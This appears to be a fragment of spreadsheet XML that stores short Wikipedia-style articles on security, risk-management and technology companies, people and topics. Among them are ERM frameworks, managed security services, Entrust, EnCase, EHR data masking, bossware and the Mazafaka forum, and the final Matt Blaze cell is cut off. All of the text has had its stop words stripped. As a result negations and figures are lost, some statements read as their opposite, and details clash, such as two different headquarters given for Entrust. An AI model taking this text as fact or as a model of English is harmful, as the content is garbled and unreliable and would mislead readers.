31000 international standard risk management published november 2009. accompanying standard, 31010 risk assessment techniques, soon followed publication (december 2009) together updated risk management vocabulary guide rims risk maturity model rims risk maturity model (rmm) enterprise risk management, published 2006, umbrella framework content methodology detail requirements sustainable effective enterprise risk management. model consists twenty-five competency drivers seven attributes create erm’s value utility organization. attributes are: erm-based approach process management risk appetite management root cause discipline uncovering risks performance management business resiliency sustainabilitythe model developed steven minsky, logicmanager, published risk insurance management society collaboration rims committee. risk maturity model based capability maturity model, methodology founded carnegie mellon university software engineering institute (sei) 1980s. implementing program goals program organizations nature manage risks variety existing departments functions ("risk functions") identify manage particular risks. however, risk function varies capability coordinates risk functions. central goal challenge improving capability coordination, integrating output provide unified picture risk stakeholders improving organization's ability manage risks effectively. typical risk functions primary risk functions large corporations participate program typically include: strategic planning identifies external threats competitive opportunities, along strategic initiatives address marketing understands target customer ensure product/service alignment customer requirements compliance ethics monitors compliance code conduct directs fraud investigations accounting financial compliance directs sarbanes–oxley section assessment, identifies financial reporting risks department manages litigation analyzes emerging legal trends impact organization insurance ensures proper insurance coverage organization treasury ensures cash sufficient meet business needs, managing risk related commodity pricing foreign exchange operational quality assurance verifies operational output within tolerances operations management ensures business runs day-to-day related barriers surfaced resolution credit ensures credit provided customers appropriate ability customer service ensures customer complaints handled promptly root causes reported operations resolution internal audit evaluates effectiveness risk functions recommends improvements corporate security identifies, evaluates, mitigates risks posed physical information security threats common challenges implementation various consulting firms offer suggestions implement program. common topics challenges include: identifying executive sponsors erm. establishing common risk language glossary. describing entity's risk appetite (i.e., risks take) identifying describing risks "risk inventory". implementing risk-ranking methodology prioritize risks within across functions. establishing risk committee chief risk officer (cro) coordinate certain activities risk functions. establishing ownership particular risks responses. demonstrating cost-benefit risk management effort. developing action plans ensure risks appropriately managed. developing consolidated reporting various stakeholders. monitoring results actions taken mitigate risk. ensuring efficient risk coverage internal auditors, consulting teams, evaluating entities. developing technical framework enables secure participation parties remote employees. internal audit role addition information technology audit, internal auditors play important role evaluating risk-management processes organization advocating continued improvement. however, preserve organizational independence objective judgment, internal audit professional standards indicate function take direct responsibility making risk management decisions enterprise managing risk-management function.internal auditors typically perform annual risk assessment enterprise, develop plan audit engagements upcoming year. this plan updated various frequencies practice. this typically involves review various risk assessments performed enterprise (e.g., strategic plans, competitive benchmarking, top-down risk assessment), consideration prior audits, interviews variety senior management. designed identifying audit projects, identify, prioritize, manage risks directly enterprise. current issues risk management processes corporations worldwide increasing regulatory private scrutiny. risk essential part business. properly managed, drives growth opportunity. executives struggle business pressures partly completely beyond immediate control, distressed financial markets; mergers, acquisitions restructurings; disruptive technology change; geopolitical instabilities; rising price energy. sarbanes–oxley requirements section sarbanes–oxley 2002 required u.s. publicly traded corporations utilize control framework internal control assessments. many opted coso internal control framework, includes risk assessment element. addition, guidance issued securities exchange commission (sec) pcaob 2007 placed increasing scrutiny top-down risk assessment included specific requirement perform fraud risk assessment. fraud risk assessments typically involve identifying scenarios potential experienced) fraud, related exposure organization, related controls, action taken result. nyse corporate governance rules york stock exchange requires audit committees listed companies "discuss policies respect risk assessment risk management." related commentary continues: "while senior management assess manage company’s exposure risk, audit committee must discuss guidelines policies govern process handled. audit committee discuss company’s major financial risk exposures steps management taken monitor control exposures. audit committee required sole body responsible risk assessment management, but, stated above, committee must discuss guidelines policies govern process risk assessment management undertaken. many companies, particularly financial companies, manage assess risk mechanisms audit committee. processes companies place reviewed general manner audit committee, need replaced audit committee." corporate debt ratings standard poor's (s&amp;p), debt rating agency, plans include series questions risk management company evaluation process. this rollout financial companies 2007. results inquiry many factors considered debt rating, corresponding impact interest rates lenders charge companies loans bonds. 2008, also announced would begin including assessment ratings non-financial companies starting 2009, initial comments reports 2008. performance standards international finance corporation performance standards focus management health, safety, environmental social risks impacts. third edition published january 2012 two-year negotiation process private sector, governments civil society organizations. they adopted equator principles banks, consortium commercial banks countries. data privacy data privacy rules, european union's general data protection regulation, increasingly foresee significant penalties failure maintain adequate protection individuals' personal data names, e-mail addresses personal financial information, alert affected individuals data privacy breached. regulation requires organization--including organizations located outside eu--to appoint data protection officer reporting highest management level handle personal data anyone living actuarial response casualty actuarial society 2003, enterprise risk management committee casualty actuarial society (cas) issued overview erm. this paper laid evolution, rationale, definitions, frameworks casualty actuarial perspective, also included vocabulary, conceptual technical foundations, actual practice applications, case studies.the specific stated goals, including leading supplier internationally educational materials relating enterprise risk management (erm) property casualty insurance arena," sponsored research, development, training casualty actuaries regard. refrained issuing credential; instead, 2007, board decided participate initiative develop global designation, make final decision later date. society actuaries 2007, society actuaries developed chartered enterprise risk analyst (cera) credential response growing field enterprise risk management. this first professional credential introduced since 1949. cera studies focus various risks, including operational, investment, strategic, reputational combine affect organizations. ceras work environments beyond insurance, reinsurance consulting markets, including broader financial services, energy, transportation, media, technology, manufacturing healthcare.it takes approximately three four years complete cera curriculum combines basic actuarial science, principles course professionalism. earn cera credential, candidates must take five exams, fulfill educational experience requirement, complete online course, attend in-person course professionalism. cera global initially ceras members society actuaries 2009 cera designation became global specialized professional credential, awarded regulated multiple actuarial bodies. also references external links thomas stanton (feb 2017). "enterprise risk management". youtube. tedxjhudc. airmic alarm (2010) structured approach enterprise risk management (erm) requirements 31000" hopkin, paul "fundamentals risk management edition" kogan-page (2012) isbn 978-0-7494-6539-1</t>
  </si>
  <si>
    <t>Managed security service</t>
  </si>
  <si>
    <t>computing, managed security services (mss) network security services outsourced service provider. company providing service managed security service provider (mssp) roots mssps internet service providers (isps) late 1990s. initially, isp(s) would sell customers firewall appliance, customer premises equipment (cpe), additional would manage customer-owned firewall dial-up connection.according recent industry research, organizations (74%) manage security in-house, professionals said either already partnered with, plan partner with, managed security service provider.businesses turn managed security services providers alleviate pressures face daily related information security targeted malware, customer data theft, skills shortages resource constraints.managed security services (mss) also considered systematic approach managing organization's security needs. services conducted in-house outsourced service provider oversees companies' network information system security. functions managed security service include round-the-clock monitoring management intrusion detection systems firewalls, overseeing patch management upgrades, performing security assessments security audits, responding emergencies. there products available number vendors help organize guide procedures involved. this diverts burden performing chores manually, considerable, away administrators. industry research firm, forrester research, identified significant vendors global market 2018 23-criteria evaluation managed security service providers (mssps)--identifying accenture, ibm, dell secureworks, trustwave, at&amp;t, verizon, deloitte, wipro others leaders mssp market. newcomers market include number smaller providers used protect homes, small businesses, high networth clients. early history managed security services early example outsourced off-site mssp service west !nteract internet security. security service require customer purchase equipment security equipment installed customers premises. service considered mssp offering west retained ownership firewall equipment firewalls operated internet point presence (pop) service based check point firewall-1 equipment. following year long beta introduction period, service generally available early 1997. service also offered managed virtual private networking (vpn) encryption security launch. industry terms asset: resource valuable company worthy protection. incident: assessed occurrence actually potentially jeopardizes confidentiality, integrity, availability asset. alert: identified information, i.e. fact, used correlate incident. categories managed security services on-site consulting this customized assistance assessment business risks, business requirements security development security policies processes. include comprehensive security architecture assessments design (include technology, business risks, technical risks procedures). consulting also include security product integration on-site mitigation support intrusion occurred, including emergency incident response forensic analysis perimeter management client's network this service involves installing, upgrading, managing firewall, virtual private network (vpn) and/or intrusion detection hardware software, electronic mail, commonly performing configuration changes behalf customer. management includes monitoring, maintaining firewall's traffic routing rules, generating regular traffic management reports customer. intrusion detection management, either network level individual host level, involves providing intrusion alerts customer, keeping date defenses intrusion, regularly reporting intrusion attempts activity. content filtering services provided email filtering data traffic filtering. product resale clearly managed service itself, product resale major revenue generator many providers. this category provides value-added hardware software variety security-related tasks. service provided archival customer data. managed security monitoring this day-to-day monitoring interpretation important system events throughout network—including unauthorized behavior, malicious hacks, denial service (dos), anomalies, trend analysis. first step incident response process. penetration testing vulnerability assessments this includes one-time periodic software scans hacking attempts order find vulnerabilities technical logical perimeter. generally assess security throughout network, accurately reflect personnel-related exposures disgruntled employees, social engineering, etc. regularly, reports given client. compliance monitoring conduct change management monitoring event identify changes system violates formal security policy. example, impersonator grants much administrative access system, would easily identifiable compliance monitoring. engaging mssp decision criteria engaging services mssp much form outsourcing: cost-effectiveness compared in-house solutions, focus upon core competencies, need round-the-clock service, ease remaining up-to-date. important factor, specific mss, outsourcing network security hands critical control company's infrastructure outside party, mssp, whilst relieving ultimate responsibility errors. client mssp still ultimate responsibility security, must prepared manage monitor mssp, hold accountable services contracted. relationship mssp client turnkey one.although organization remains responsible defending network information security related business risks, working mssp allows organization focus core activities remaining protected network vulnerabilities. business risks result information assets upon business depends securely configured managed (resulting asset compromise violations confidentiality, availability, integrity). compliance specific government-defined security requirements achieved using managed security services. managed security services mid-sized smaller businesses business model behind managed security services commonplace among large enterprise companies security experts. model later adapted medium-sized smaller companies (smbs organizations employees, employees site) value-added reseller (var) community, either specializing managed security offering extension managed service solutions. smbs increasingly turning managed security services several reasons. chief among specialized, complex highly dynamic nature security growing number regulatory requirements obliging businesses secure digital safety integrity personal information financial data held transferred computer networks. whereas larger organizations typically employ specialist department, organizations smaller scale distributed location businesses, medical dental offices, attorneys, professional services providers retailers typically employ full-time security specialists, although frequently employ staff external consultants. organizations, many constrained budget limitations. address combined issues lack expertise, lack time limited financial resources, emerging category managed security service provider arisen. organizations across sectors shifting managed security services traditional in-house security practices. trend outsourcing security jobs managed security services vendors picking appreciable pace. this also helps enterprises focus core business activities strategic approach. effective management, cost-effectiveness seamless monitoring major drivers fueling demand services. further, increase participation leading companies worldwide, user enterprises gaining confidence outsourcing security.services providers category tend offer comprehensive security services delivered remotely managed appliances devices simple install part background. fees normally highly affordable reflect financial constraints, charged every month flat rate ensure predictability costs. service providers deliver daily, weekly, monthly exception-based reporting depending client's requirements.today security become power weapon cyberattacks become highly sophisticated. enterprises toil keep malware deviant e-mail spoofing fraud gambit. among different prominent players, managed security service provider observe growing need combat increasingly complicated intended attacks. response, vendors busy enhancing sophistication solution, many cases winning security expert expand portfolio. besides increasing regulatory compliance associated protection citizen's data worldwide, likely stimulate enterprises ensure high data-security level. some frontrunners engaging managed security services financial services, telecom, information technology etc. maintain competitive edge, vendors focusing refining product offering technologies deployed clients. another crucial factor profitability remains capability lower cost generate revenue avoiding deployment additional tools. simplifying service creation integration products ensures unprecedented visibility well integration. besides this, market would witness tremendous growth regions north america, europe, asia –pacific latin america, middle east africa. also information security operations center security service references further reading amanda andress (2003). "managed security services". surviving security. press. 353–358. isbn 9780849320422. roberta bragg; mark rhodes-ousley keith strassberg (2004). "managed security services". network security. mcgraw-hill professional. 110–113. isbn 9780072226973. warren axelrod (2004). outsourcing information security. artech house. isbn 9781580535311.</t>
  </si>
  <si>
    <t>Entrust</t>
  </si>
  <si>
    <t>entrust corp., formerly entrust datacard, provides software hardware used issue financial cards, e-passport production, user authentication looking access secure networks conduct financial transactions, trust certificated websites, mobile credentials, connected devices. privately-held company based shakopee, minnesota employs 2,500 people globally. history entrust 1994, entrust built sold first commercially available public infrastructure. 1997, nortel (formerly northern telecom) spun entrust became incorporated maryland part strategy. entrust originally entered public market chaining thawte root 1999 creating entrust.net.in 2000 entrust acquired encommerce, provider authentication authorization technologies.in april 2002, entrust's public infrastructure technology served foundation prototype united states federal bridge certification authority. authority element trust infrastructure provides basis intergovernmental cross-governmental secure communications.in mid-2004, entrust acquired amikanow! corporation's content scanning, analysis compliance technology. technology designed automatically analyze categorize email message document content based contextual meaning, rather pre-defined word lists. entrust acquired orion security solutions, supplier public infrastructure services, june 2006.in july 2006, entrust acquired business signatures corporation, supplier non-invasive fraud detection solutions, million (usd). from gaap accounting perspective, total purchase price approximately $55.0 million, including assumed stock options, transaction expenses asset value. business signatures founded 2001 redwood city, california former executives oracle, cisco. originally funded texas pacific group, walden international, shriram google dave roux silver lake partners. prior becoming private-equity company, entrust included russell 3000 index july 2008. july 2007, entrust contributed public infrastructure technology open-source community microsystems, inc. mozilla foundation. specifically, entrust supplied certificate revocation list distribution points (crl-dp), patent 5,699,431, royalty-free license incorporation capability mozilla open-source libraries.in september 2008, entrust participated epassports conformity interoperability tests prague, czech republic. facilitated consortium european commission, brussels interoperability group (big) european commission joint research centre, prague tests allowed european countries verify conformance second-generation epassports containing fingerprint biometric data protected extended access control functions, commonly referred eac. additional testing included verification crossover interoperability inspection systems epassports different countries. july 2009, entrust acquired thoma bravo, u.s.-based private equity firm, $124 million. datacard group company established 1969 data card addressograph willis drake acquired minnesota-based firm produced credit card imprinters. company founder willis drake team engineers invented machines enabled secure productive personalization credit cards beyond imprinters addressograph offered. datacard group's high-volume card issuance systems allowed banks retailers personalize 1,500 cards hour great precision security. until company launched technologies, process slow riddled quality problems.under ownership early 1990s, company refined core technologies expanded additional markets, including government enterprise. shortly owners purchased company took private, development efforts re-energized core technologies quickly expanded beyond basic card embossing magnetic stripe encoding. inline card personalization technologies included color printing rivaled lithographic output encoding contact contactless smart cards.development efforts multiple offerings, including world's first digital photo card system desktop card printer 1994. until launch technology, governments, corporations security-minded enterprises primarily used cut-and-paste processes involved laminating color photographs paper identification cards. digital systems brought levels security economy identification process.through 1990s early 2000s, data card corporation steadily grew revenues expanding beyond hardware include software customized developments introducing driver's licenses, national ids, traditional passports e-passports (which elevated document security incorporating biometrics, laser engraving, digital imaging, data encryption technologies). significant revenue gains also driven continued leadership financial card market. through 1990s, 2000s today, vast majority world's credit, debit prepaid cards personalized using high-volume desktop issuance systems.in 2000, datacard group acquired platform seven (p7), smart card technology national westminster bank.in 2010, company also acquired dynamic card systems (dcs) denver, colorado. addition engineering sales teams, acquisition included card issuance software, cardwizard. other acquisitions recent years expanded company's core capabilities surrounding trusted identity secure transactions including safelayer trustis.[1]the company's products include high-volume central card issuance systems, including desktop printers, software supplies. other hardware products including high-value systems issuing passports creating customized mail packages cards personalized credentials. software offerings include products issuing managing financial cards, smart cards, cards, passports, national ids, student credentials.a rapidly growing portion company's portfolio focused instant issuance credit, debit prepaid cards. banks, retailers, credit unions organizations issuing cards used financial transactions rapidly deploying systems used issue cards on-demand branch store locations. these instant issuance systems often used issuing emergency replacements cards lost, stolen compromised breaches. most often, complement centralized operations focus mass issuance aspects card program.the company also derives strong revenues supplies service. supply offerings include overlays embedded variety advanced technologies, including optical variable devices (ovds), holographic images various advanced materials improve security longevity cards, passport booklets credentials. company's service organization supports customers countries portfolio consultative professional services technical support, available online, on-call onsite. service experts often located onsite large customer installations develop highly collaborative relationships in-house operations teams.as 2011 privately held company.in 2013 company acquired entrust inc, expanded portfolio include entrustpublic infrastructure, certificate software authentication platforms strengthen security wide range identity transaction ecosystems. entrust datacard 2014, datacard group rebranded entrust datacard.in june 2019 acquired general-purpose hardware security module vendor ncipher thales group. entrust corp september 2020, company announced re-branded entrust datacard entrust changed legal entity name entrust corporation. rebranding recognized company's emphasis secure identity, payments data protection.in january 2021, entrust acquired hytrust, inc., provider virtualized multi-cloud data encryption, management, cloud security posture management.today, company offers wide variety digital security credential issuance like crossing borders, making purchases, accessing e-government services logging corporate networks. organization expanded offerings series acquisitions, including hardware security module vendor ncipher (june 2019); hytrust (january 2021), provider manage data security, current environments emerging cloud infrastructures; worldreach software (april 2021), creates seamless traveler experiences digital transformation process immigration border management. products examples company's diverse offerings include software hardware used issue financial cards, produce e-passports; authenticate users looking access secure networks conduct financial transactions; provide trusted certificates websites, mobile credentials, connected devices; hardware security modules software secure encryption management. privately held company based minneapolis, minnesota employs 2,500 people globally. company leadership todd wilkinson served datacard group (and entrust) president since june 2008. previously, company's nearly three years worked number executive positions general electric. kurt ishaug company's lisa tibbits general counsel. kurt ishaug company's lisa tibbits general counsel. references</t>
  </si>
  <si>
    <t>Syhunt</t>
  </si>
  <si>
    <t>syhunt world wide network security software company headquarters janeiro, brazil. syhunt founded august 2003 felipe daragon, network security specialist. history company's operations currently centered development software relating assessment servers applications. 2003, syhunt released application security assessment software known sandcat, focuses open application security project (owasp) sans institute vulnerabilities. syhunt also produced number security software utilities, including worm removal tools (during worm outbreaks), server hardening analysis tools. today company still engaged development application security assessment software also participates common vulnerabilities exposures (cve) initiative. also penetration testing references external links official website</t>
  </si>
  <si>
    <t>EnCase</t>
  </si>
  <si>
    <t>encase shared technology within suite digital investigations products guidance software (acquired opentext 2017). software comes several products designed forensic, cyber security, security analytics, e-discovery use. encase traditionally used forensics recover evidence seized hard drives. encase allows investigator conduct depth analysis user files collect evidence documents, pictures, internet history windows registry information. company also offers encase training certification. data recovered encase used various court systems, cases killer murder danielle dam. additional encase forensic work documented cases evidence provided casey anthony, unabomber, mucko (wakefield massacre) cases. company product overview guidance software, encase forensic tool, originally created shawn mccreight. 2002 encase enterprise released allowing first network enabled digital forensic tool used forensic, investigative, security matters. 2005 encase ediscovery released enabled network abilities encase allow identification, collection, preservation, analysis litigation investigative purposes. 2007 encase airs (automated incident response suite) released (now discontinued evolved encase endpoint security) automate scanning, documenting, remediation abilities encase enterprise. also 2007 release encase information assurance, encase data audit policy enforcement (both also effectively integrated encase endpoint security). 2008 encase cybersecurity released combined many tools automation previous security functions streamlined workflow incident response. 2015 encase endpoint security released evolution endpoint security user friendly interface well integration many security tools expedite shorten response time attack event. 2016 encase enterprise needed face lift distributed agent (formerly referred servlet) given abilities redesign encase endpoint investigator. also 2016 release encase risk manager data risk assessment, audit, dlp-like services, compliance. 2017 guidance software acquired opentext, company name "guidance software" longer used. encase product line encase technology available within number products, currently including: encase forensic, encase endpoint investigator, encase ediscovery (which includes encase legal hold), encase endpoint security encase portable. guidance software also runs training courses foundations computer forensics, several expert series courses include enscripting course automate various functions within encase. further, certification offered train toward prove knowledge within various fields include ence (encase certified examiner), encep (encase certified ediscovery practitioner), cfsr (certified forensic security responder). encase training team trained 100000 individuals date. features encase contains tools several areas digital forensic process; acquisition, analysis reporting. software also includes scripting facility called enscript various api's interacting evidence. expert witness file format encase contains functionality create forensic images suspect media. images stored proprietary expert witness file format; compressible file format prefixed case data information consists bit-by-bit (i.e. exact) copy media inter-spaced hashes every data. file format also appends hash entire drive footer. mobile forensics encase mobile phone analysis possible addition add-ons available guidance software. references further reading garber, lee. "encase: case study computer-forensic technology" (pdf). ieee computer society. retrieved november 2010.</t>
  </si>
  <si>
    <t>Masking (Electronic Health Record)</t>
  </si>
  <si>
    <t>electronic health records (ehr’s) data masking, controlled access, process concealing patient health data certain healthcare providers. patients right request masking personal information, making inaccessible physician, particular physician, unless specific reason provided. data masking also performed healthcare agencies restrict amount information accessed external bodies researchers, health insurance agencies unauthorised individuals. method used protect patients’ sensitive information privacy confidentiality less concern. techniques used alter information within patient’s include data encryption, obfuscation, hashing, exclusion perturbation. confidentiality increased access transpires introducing ehr's seen large concern patients. masking information technique contributes establishing confidentiality ehr's, large amount sensitive information contained within records. history health outcomes drug/alcohol abuse, sexually transmitted infections abortion pregnancy known lead social discrimination cause social harm patient, hence importance protecting content within ehr's. masking limits access internal external individuals particular record, increasing protection contents. when patients apply masking ehr, health services must meet needs alter system accordingly unauthorised individuals can't gain access. patient masking requests increase security ehr's, patients elect mask information signing form provided health service. necessary health services software notify educate patients data masking capabilities advantages disadvantages process. submitting request, patients given control specify physicians health service staff members provided consent right access record. health services must abide patient masking requests health records implement data masking techniques within technology, otherwise major consequences result. addition, audit trails implemented health services track identify individuals accessed patients certain time period. unmasking patient care, authorised users ability override masking access restrictions emergency circumstances. patient critical health state treatment urgently required, physicians provided right access required information within ehr. this mechanism known "breaking glass." unmasking patient's audited, sufficient reason access generally required. data masking techniques masking refers sets alterations changes made protect information within confines electronic health records. masking performed patients request, common method used assist conduction clinical epidemiological research. reduces confidentiality privacy concerns associated supplying information external bodies. general, direct identifiers removed dataset, replaced random values, changed using hashing function, restored unique key. mechanisms expanded following headings. encryption encryption often complex form data masking, although relatively safe secure method. involves inserting password grant individual access view certain data. only permitted users provided password therefore capacity recover sensitive information included within ehr. when system requests data masking ehr, access extremely difficult time-consuming hackers unauthorized users, possess unique code decrypt data. data obfuscation data obfuscation limits sharing highly sensitive health information within electronic health record scrambling particular data elements prevent unauthorized access. technique doesn’t physically mask data; alters data avoid detection external network systems. data obfuscation commonly used increases anonymity preserves relationships within dataset would often destroyed rigorous forms masking. methods evident interrelated numeric data addresses dates. example, research epidemiologists interested accessing highly specific location data correlate patterns diseases within particular neighborhoods cities. however, finding clusters poor health outcomes don’t require knowledge actual patient addresses, simply requires relationships patient addresses. result, data extraction study translate addresses another metric preserves locations without revealing actual physical location. data perturbation data perturbation alterations made either input databases query results returned. data perturbation involves preserving aggregate trends original data removing modifying actual data. example, clinical data swapped ehr's, preserving existing values field eliminating specific mapping fields record. random “noise” also added data, maintaining statistical properties field randomly altering exact values within particular ehr. data perturbation hailed effective data protection techniques, whilst relatively simple implement. data exclusion data exclusion involves removal specific data elements restrict accessed. process involves often removing entirely system patients request) removing specific sections patients record. this method masking provides highest level confidentiality; however, continuity care significantly affected cases. addition, data exclusion ehr’s commonly applied external researchers investigating nature patient health outcomes. protect individual privacy, patient identifiers demographics name, date birth address, removed copied ehr's, whilst researchers evaluate clinical information diagnoses performed procedures. process ensures patients’ sensitive information remains anonymous whilst gains research still made. data hashing data hashing involves blocking de-identifying certain characters within strings information personal information longer recognizable original form. this method ensures masked information longer visually identifiable unauthorized users. fact data hashing alters data means appropriate applied data required future. instance, study conducted investigate prevalence type diabetes victoria, australia, researchers would require demographic information regarding state residence. protect patient privacy confidentiality, specific indicators house number, address, suburb post code would masked. example: xxxxx street, xxxx, victoria, australia, post code 31xx. reference list</t>
  </si>
  <si>
    <t>Employee monitoring software</t>
  </si>
  <si>
    <t>employee monitoring software means employee monitoring, allows company administrators monitor supervise employee computers central location. normally deployed business network allows easy centralized viewing central networked sometimes, companies monitor employees using remote desktop software instead. purpose employee monitoring software used supervise employees' performance, prevent illegal activities, avoid confidential info leakage, catch insider threats. nowadays employee monitoring software widely used technology companies. features employee monitoring program monitor almost everything computer, keystrokes passwords inputted, websites visited, chats facebook messenger, skype social chats. piece monitoring software also capture screenshots mobile activities. e-mail monitoring includes employers access records employee’s e-mails sent company’s servers. companies keyword searches natural language processing analyze e-mails. administrator view logs cloud panel, receive logs email. criticism bossware, also known tattleware, software allows supervisors automatically monitor productivity employees. common features bossware include activity monitoring, screenshotting and/or screen recording, keystroke logging, webcam and/or microphone activation, "invisible" monitoring. bossware called form spyware. during covid-19 pandemic, bossware companies monitor employees increased.the electronic frontier foundation (eff) denounced bossware violation privacy. center democracy technology (cdt) denounced bossware threat safety health employees.during covid-19 pandemic, members r/antiwork subreddit shared various mouse jiggler strategies combat bossware intended monitor productivity remote workers.a study reports data predicts global market employee remote monitoring software $1.3 billion 2027. also computer surveillance computer surveillance workplace satisfaction malware spyware trojan horse user activity monitoring references</t>
  </si>
  <si>
    <t>Elephant Action League</t>
  </si>
  <si>
    <t>elephant action league (eal) environmental non-governmental organization founded 2013 united states andrea crosta, gilda moratti, francesco rocca. based angeles, california. wildleaks project eal, along organizations including environmental investigation agency (uk), oxpeckers center (south africa), ecojust (the netherlands), global (africa southeast asia), 100reporters, others, maintain wildleaks, online environmental whistleblower platform. site facilitates collection confidential information tor-based online platform, users securely share anonymous tips wildlife crime, reviewed experts. china investigation performed 10-month undercover investigation documenting areas illegal ivory opportunistically enters legal ivory market hong kong mainland china. published report investigation december 2015, called china’s loopholes, hopes. references external links official website https://www.cites.org/ https://web.archive.org/web/20170708224255/http://theivorygame.org/ https://wildlifejustice.org/ https://biglife.org/</t>
  </si>
  <si>
    <t>Mazafaka (hacker group)</t>
  </si>
  <si>
    <t>mazafaka cybercrime forum many users moved sites shadowcrew.the site offered services customisation zeus malware target specific system. references</t>
  </si>
  <si>
    <t>Mayfield's paradox</t>
  </si>
  <si>
    <t>mayfield's paradox states keep everyone information system requires infinite amount money, everyone onto information system also requires infinite money, costs extremes relatively low.the paradox depicted u-curve, cost system vertical axis, percentage humanity access system horizontal axis. acceptance paradox information security community immediate, consistent professional experiences group. mayfield's paradox points that, point curve, additional security becomes unrealistically expensive. conversely, point curve, becomes unrealistically expensive additional users. based paradox menz brothers developed "menz theorems information physical security". theorems present formulas covering access security information systems physical facilities. they used help determine allocation resources response levels. notes also list paradoxes</t>
  </si>
  <si>
    <t>Elmo (company)</t>
  </si>
  <si>
    <t>elmo japanese electronics optics company produces cctv equipment (including cameras), projectors, presentation devices. they also well known series high-end super projectors 1970s. history company founded 1921 sakaki shōkai (榊商会) hidenobu sakaki. company released first 16mm projector (model 1927, first device manufactured japan.the company renamed g.k. elmo-sha (エルモ社, "elmo co.") 1933, abbreviation "electricity light machine organization". first projector (model hayabusa) released three years later, 1936, elmoflex series cameras introduced early 1940s. however, production quickly halted world ii.production resumed quickly ended, january 1946, elmo company founding members optical precision instruments manufacturers' association (光学精機工業協会, kōgaku seiki kōgyō kyōkai). company incorporated k.k. elmo-sha (エルモ社, "elmo co., ltd.") 1949. continued making elmoflex second half 1950s, dropped production still cameras. elmo continued producing products, introducing super projectors cameras meet then-new format. however 1970s company would release famous products, namely gs-series super projectors, including gs-800, gs-1200 st-1200hd, three often regarded company's crown jewels terms projectors. home video took toll super scene, elmo ceased production projectors, final models gs-1200 xenon 1983. following this, company began making cameras 1984, introduced ev-308 document camera 1988, late moved educational technical equipment. 2010, elmo company merged tietech establish techno horizon group, ltd. company since managed subsidiaries engaging development, manufacturing, distribution telecommunication, factory automation image information equipment. 2021, company still produces educational equipment teachers schools, separate departments usa, japan europe. references external links official website official website</t>
  </si>
  <si>
    <t>Syrian Collegiate Programming Contest</t>
  </si>
  <si>
    <t>syrian collegiate programming contest (abbreviated acm-scpc scpc) annual multi-tiered competitive programming competition among universities syria qualifying round arabian collegiate programming contest (acpc). winners scpc qualify acpc finals. usually held july year. headquartered syrian computer society. scpc operates autonomous cities syria auspices icpc foundation accordance acpc policies procedures. history scpc traces roots competition held syrian computer society 2011. then, also hosted syrian computer society 2012 2013. 2014, co-hosted damascus tishreen university. 2015, hosted tishreen university. 2016, hosted higher institute applied sciences technology. 2017, hosted syrian virtual university. latest (rip english) scpc standings scpc 2017 first places also student research competition competitive programming, type mind sport involved programming competitions international collegiate programming contest online judge, service practice programming contests online pc², programming contest control system support computer programming contest activities (used icpc world finals 2008) references external links official website acm-scpc official website acm-icpc maintained baylor university. acm-icpc live archive maintained baylor university. acm-scpc facebook</t>
  </si>
  <si>
    <t>SIOS LifeKeeper</t>
  </si>
  <si>
    <t>sios lifekeeper (formerly known steeleye lifekeeper) high-availability cluster software, linux computer systems. provides application cluster capabilities nonstop operation disaster recovery systems running databases, file sharing network, electronic commerce websites, systems applications requiring nonstop operation originally designed developed at&amp;t bell labs 1992 ensure high availability worldwide voice network system running unix-based star servers. after at&amp;t divested lifekeeper division ncr, steeleye acquired technology 1999. steeleye later renamed sios technology corp. 2006, acquired sios technology, inc. description high availability clusters (hac) improve application availability failing switching group systems—as opposed high performance clusters, improve application performance running multiple systems simultaneously. sios lifekeeper provides continuous monitoring entire application stack recover service application locally another cluster node site another geographic location. supports major linux distributions accommodates wide range storage architecture. sios clustering software synchronizes local storage cluster nodes creating cluster cloud shared storage available. sios lifekeeper sap-certified netweaver s/4hana monitor critical services automatically apply best practices nonstop operation critical environments. similar products include fujitsu primecluster, hacmp, serviceguard, tivoli system automation multiplatforms mp), linux-ha, microsoft cluster server (mscs), expresscluster, cluster suite, veritas cluster server cluster. 2009, company launched program enabling users serviceguard, stopped selling year, migrate lifekeeper linux product. lifekeeper best clustering solution award linuxworld several occasions. also high-availability cluster cluster computer cluster references external links official website</t>
  </si>
  <si>
    <t>Matt Curtin</t>
  </si>
  <si>
    <t>matt curtin (born 1973) computer scientist entrepreneur columbus, ohio best known work cryptography firewall systems. founder interhack corporation, first faculty advisor open source club ohio state university, lecturer department computer science engineering ohio state university, teaches common lisp course. author books, developing trust: online privacy security brute force: cracking data encryption standard. curtin's work includes helping prove weakness data encryption standard providing expert testimony blumofe pharmatrak, ruling made u.s. court appeals first circuit, showing electronic communications privacy (ecpa) applies technology. references external links matt curtin's homepage interhack corporation</t>
  </si>
  <si>
    <t>Synd iNNOVATE</t>
  </si>
  <si>
    <t>synd innovate 2019 national level hackathon conducted syndicate bank september 2019 encourage innovation banking industry. attracted 3,500 ideas applicants india final teams called onsite hackathon. themes synd innovate 2019 thirteen themes participate, follows: open innovation customer social profiling voice based customer grievance redressal system agents(referral marketing affiliate marketing) branch wise customer ranking digital banking channels rewards mechanism centralized system checking branch ambience cleanliness whatsapp business integration amazing customer experience. automated queue management system branch. developing automated system identification triggering alert high worth customer visits branch and/or using digital platform like internet/mobile banking etc. mobile number verification customers scan, missed call easy procedure design ux/ui laps early fraud detection mechanism customer acquisitionsynd innovate received 3500 ideas themes combined. then teams shortlisted participate round submission online prototype, prototypes, selected final onsite hackathon bengaluru. hackathon schedule management synd innovate managed bhanu srivastav syndicate bank. working business process re-engineering innovation department syndicate bank corporate office. event managed hackerearth.the hackathon scheduled phases: phase idea submission (online) phase prototype submission (online) phase onsite hackathon (offline) prize money winners was: prize 3,00,000/- prize 2,00,000/- prize 1,00,000/- consolation prizes 10,000/- reception final event organized successfully bengaluru. references</t>
  </si>
  <si>
    <t>Matt Blaze</t>
  </si>
  <si>
